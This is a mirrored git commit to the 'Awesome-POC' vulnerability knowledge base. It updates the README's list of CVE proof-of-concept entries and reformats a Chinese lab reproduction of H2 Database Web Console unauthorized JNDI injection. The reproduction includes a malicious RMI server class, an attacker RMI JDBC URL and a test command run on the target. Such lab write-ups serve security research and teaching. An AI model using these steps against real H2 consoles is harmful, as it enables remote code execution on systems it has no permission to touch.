mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-05-05 10:17:34 +00:00
update
This commit is contained in:
parent
57ec6ea48b
commit
de73fb6e15
19
README.md
19
README.md
@ -4,8 +4,7 @@
|
||||
|
||||
_Disclaimer: The technologies, concepts, and tools provided in this Git repository are intended for educational and research purposes only. Any use for illegal activities, unauthorized penetration testing, or commercial purposes is strictly prohibited. Please read the [Awesome-Lows](https://github.com/Threekiii/Awesome-Laws) before using this repository._
|
||||
|
||||
|
||||
📖 一个漏洞 PoC 知识库。_A knowledge base for vulnerability PoCs(Proof of Concept), with 1k+ vulnerabilities._
|
||||
📖 一个漏洞 PoC 知识库。_A knowledge base for vulnerability PoCs(Proof of Concept), with 1k+ vulnerabilities._
|
||||
|
||||
## 0x01 项目导航
|
||||
|
||||
@ -735,9 +734,10 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
|
||||
* Zabbix Server trapper命令注入漏洞 CVE-2020-11800
|
||||
- 云安全漏洞
|
||||
|
||||
* Docker build 漏洞导致命令执行 CVE-2019-13139
|
||||
* Docker daemon api 未授权访问漏洞 RCE
|
||||
* K8s API Server未授权命令执行
|
||||
* K8s etcd未授权访问
|
||||
* Kubernetes API Server 未授权命令执行
|
||||
* Kubernetes etcd 未授权访问
|
||||
* Kubernetes Ingress-nginx admission 远程代码执行漏洞 CVE-2025-1974
|
||||
* MinIO SSRF 漏洞 CVE-2021-21287
|
||||
* Nacos secret.key 默认密钥 未授权访问漏洞
|
||||
@ -752,6 +752,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
|
||||
- 人工智能漏洞
|
||||
|
||||
* Huggingface Transformers Checkpoint 反序列化漏洞 CVE-2024-3568
|
||||
* Langflow code API 未授权远程代码执行漏洞 CVE-2025-3248
|
||||
* Ollama 文件存在性泄露漏洞 CVE-2024-39719
|
||||
* Ollama 文件存在性泄露漏洞 CVE-2024-39722
|
||||
* Ollama 目录遍历致代码执行漏洞 CVE-2024-37032
|
||||
@ -897,7 +898,10 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
|
||||
* ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427
|
||||
* Elasticsearch 未授权访问
|
||||
* ElasticSearch 目录穿越漏洞 CVE-2015-3337
|
||||
* H2 Database Console 未授权访问
|
||||
* H2 Database Web Console 未授权 JDBC 攻击导致远程代码执行 CVE-2022-23221
|
||||
* H2 Database Web Console 未授权 JNDI 注入 RCE 漏洞 CVE-2021-42392
|
||||
* H2 Database Web Console 未授权访问
|
||||
* H2 Database Web Console 认证远程代码执行漏洞 CVE-2018-10054
|
||||
* Hadoop YARN ResourceManager 未授权访问
|
||||
* InfluxDB JWT 认证绕过漏洞 CVE-2019-20933
|
||||
* InfluxDB 未授权访问漏洞
|
||||
@ -1114,8 +1118,9 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
|
||||
|
||||
本项目收集漏洞均源于互联网:
|
||||
|
||||
- Peiqi:https://github.com/PeiQi0/PeiQi-WIKI-Book
|
||||
- Vulhub:https://github.com/vulhub/vulhub
|
||||
- https://github.com/PeiQi0/PeiQi-WIKI-Book
|
||||
- https://github.com/vulhub/vulhub
|
||||
- https://github.com/Metarget/metarget
|
||||
|
||||
## 0x03 更新日志
|
||||
|
||||
|
@ -1,4 +1,4 @@
|
||||
# K8s API Server 未授权命令执行
|
||||
# Kubernetes API Server 未授权命令执行
|
||||
|
||||
## 漏洞描述
|
||||
|
@ -1,4 +1,4 @@
|
||||
# K8s etcd未授权访问
|
||||
# Kubernetes etcd 未授权访问
|
||||
|
||||
## 漏洞描述
|
||||
|
Binary file not shown.
Before Width: | Height: | Size: 110 KiB |
Binary file not shown.
Before Width: | Height: | Size: 274 KiB |
@ -1,15 +1,15 @@
|
||||
# H2 Database Console 未授权访问
|
||||
# H2 Database Web Console 未授权访问
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权:
|
||||
H2 database 是一款 Java 内存数据库,多用于单元测试。H2 database 自带一个 Web 管理页面,在 Spirng 开发中,如果我们设置如下选项,即可允许外部用户访问 Web 管理页面,且没有鉴权:
|
||||
|
||||
```
|
||||
spring.h2.console.enabled=true
|
||||
spring.h2.console.settings.web-allow-others=true
|
||||
```
|
||||
|
||||
利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。
|
||||
利用这个管理页面,我们可以进行 JNDI 注入攻击,进而在目标环境下执行任意命令。
|
||||
|
||||
参考链接:
|
||||
|
||||
@ -17,17 +17,17 @@ spring.h2.console.settings.web-allow-others=true
|
||||
|
||||
## 环境搭建
|
||||
|
||||
执行如下命令启动一个Springboot + h2database环境:
|
||||
执行如下命令启动一个 Springboot + h2database 环境:
|
||||
|
||||
```
|
||||
docker-compose up -d
|
||||
```
|
||||
|
||||
启动后,访问`http://your-ip:8080/h2-console/`即可查看到H2 database的管理页面。
|
||||
启动后,访问 `http://your-ip:8080/h2-console/` 即可查看到 H2 database 的管理页面。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
目标环境是Java 8u252,版本较高,因为上下文是Tomcat环境,我们可以参考《[Exploiting JNDI Injections in Java](https://www.veracode.com/blog/research/exploiting-jndi-injections-java)》,使用`org.apache.naming.factory.BeanFactory`加EL表达式注入的方式来执行任意命令。
|
||||
目标环境是 Java 8u252,版本较高,因为上下文是 Tomcat 环境,我们可以参考《[Exploiting JNDI Injections in Java](https://www.veracode.com/blog/research/exploiting-jndi-injections-java)》,使用 `org.apache.naming.factory.BeanFactory` 加 EL 表达式注入的方式来执行任意命令。
|
||||
|
||||
```java
|
||||
import java.rmi.registry.*;
|
||||
@ -53,33 +53,32 @@ public class EvilRMIServerNew {
|
||||
}
|
||||
```
|
||||
|
||||
我们可以借助这个小工具[JNDI](https://github.com/JosephTribbianni/JNDI)简化我们的复现过程。
|
||||
我们可以借助这个小工具 [JNDI](https://github.com/JosephTribbianni/JNDI) 简化我们的复现过程。
|
||||
|
||||
首先设置JNDI工具中执行的命令为`touch /tmp/success`:
|
||||
首先设置 JNDI 工具中执行的命令为 `touch /tmp/success`:
|
||||
|
||||

|
||||
|
||||
然后启动`JNDI-1.0-all.jar`,在h2 console页面填入JNDI类名和URL地址:
|
||||
然后启动 `JNDI-1.0-all.jar`,在 h2 console 页面填入 JNDI 类名和 URL 地址:
|
||||
|
||||

|
||||
|
||||
Driver Class(JNDI的工厂类):
|
||||
Driver Class(JNDI 的工厂类):
|
||||
|
||||
```
|
||||
javax.naming.InitialContext
|
||||
```
|
||||
|
||||
JDBC URL(运行JNDI工具监听的RMI地址):
|
||||
JDBC URL(运行 JNDI 工具监听的 RMI 地址):
|
||||
|
||||
```
|
||||
rmi://192.168.128.1:23456/BypassByEL
|
||||
```
|
||||
|
||||
点击连接后,恶意RMI成功接收到请求:
|
||||
点击连接后,恶意 RMI 成功接收到请求:
|
||||
|
||||

|
||||
|
||||
`touch /tmp/success`已成功执行:
|
||||
`touch /tmp/success` 已成功执行:
|
||||
|
||||

|
||||
|
Loading…
x
Reference in New Issue
Block a user